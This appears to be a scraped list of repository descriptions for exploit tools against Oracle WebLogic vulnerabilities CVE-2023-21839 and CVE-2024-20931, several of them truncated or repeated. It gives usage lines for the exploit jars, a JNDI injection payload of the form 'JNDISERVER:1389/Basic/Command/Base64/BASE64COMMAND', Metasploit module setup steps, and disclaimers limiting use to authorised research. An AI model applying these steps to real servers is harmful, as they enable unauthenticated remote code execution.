CVE-2023-21839

Weblogic-CVE-2023-21839 CVE-2023-21839 根据网络公开poc造的轮子 影响版本 122130 122140 141100 使用方法 java -jar 目标ip:端口 ldap地址 推荐工具： githubcom/WhiteHSBG/JNDIExploit 免责声明 此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！ 如果使用者使用该工具出现任

CVE-2023-21839-metasploit-scanner Usage git clone githubcom/kurehalin/CVE-2023-21839-metasploit-scanner cd CVE-2023-21839-metasploit-scanner mkdir -p ~/msf4/modules/auxiliary/scanner/http cp weblogic_iiop_rcepy ~/msf4/modules/auxiliary/scanner/http chmod +x ~/msf4/modules/auxiliary/scanner/http/weblogic_iiop_rcepy msfconsole POC usage use auxiliary/scanner/http/we

CVE-2023-21839工具

CVE-2023-21839 分析 该漏洞是因为通过t3或iiop协议绑定了对象之后调用lookup或list方法的时候触发了绑定对象的getReferent方法 调用栈 t3协议的 getObjectInstance:96, WLNamingManager (weblogicjndiinternal) resolveObject:377, ServerNamingNode (weblogicjndiinternal) resolveObject:856, BasicNamingNode (weblogicjndiinternal) lookup:209, Bas

CVE-2023-21839 exp

CVE-2023-21839 Weblogic RCE Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core) Supported versions that are affected are 122130, 122140 and 141100 Easily exploitable vulnerability allows unauthenticated attacker with network access via T3, IIOP to compromise Oracle WebLogic Server Successful attacks of this vulnerabil

Weblogic-CVE-2023-21839 CVE-2023-21839 根据网络公开poc造的轮子 影响版本 122130 122140 141100 使用方法 java -jar 目标ip:端口 ldap地址 推荐工具： githubcom/WhiteHSBG/JNDIExploit 免责声明 此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！ 如果使用者使用该工具出现任

CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol

🚨 CVE-2024-20931 🚨 CVE-2024-20931 Oracle A RCE vuln based on Weblogic T3\IIOP protocol A new attack surface for JNDI injection-CVE-2024-20931 analysis introduction In the latest official January 2024 patch released by Oracle, a remote command execution vulnerability CVE-2024-20931 based on the Weblogic T3\IIOP protocol has been fixed This vulnerability was submitted to O

CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839

CVE-2024-20931 CVE-2024-20931, this is the bypass of the patch of CVE-2023-21839 Oracle Weblogic Usage: Setup JNDI, the specific one from githubcom/WhiteHSBG/JNDIExploit/ Exploit: java -jar CVE-2024-20931jar Please input target IP:127001 Please input target port:7001 Please input RMI Address(ip:port/exp):JNDISERVER:1389/Basic/Command/Base64/BASE64COMMAND

POC&EXP of CVE-2023-21839 CVE-2023-21839 Analysis Article JNDI-Injection-Exploit Description Before running the PoC script, it's advisable to add the following JAR files as library dependencies: coherence\lib oracle_common\lib oracle_common\modules wlserver\modules POC&EXP satoshi-boxcom/pay/CJiWn8

CVE-2023-21839 Python版本

CVE-2023-21839 依据特殊需求将@4ra1n 大佬的GO版本翻译成了Python，再此感谢！ 免责声明 本程序应仅用于授权的安全测试与研究目的，请使用者遵照网络安全法合理使用。 使用者使用该工具出现任何非法攻击等违法行为，与作者无关。 使用 vulhub 复现：链接 ___ __ ____ ___ ____ _____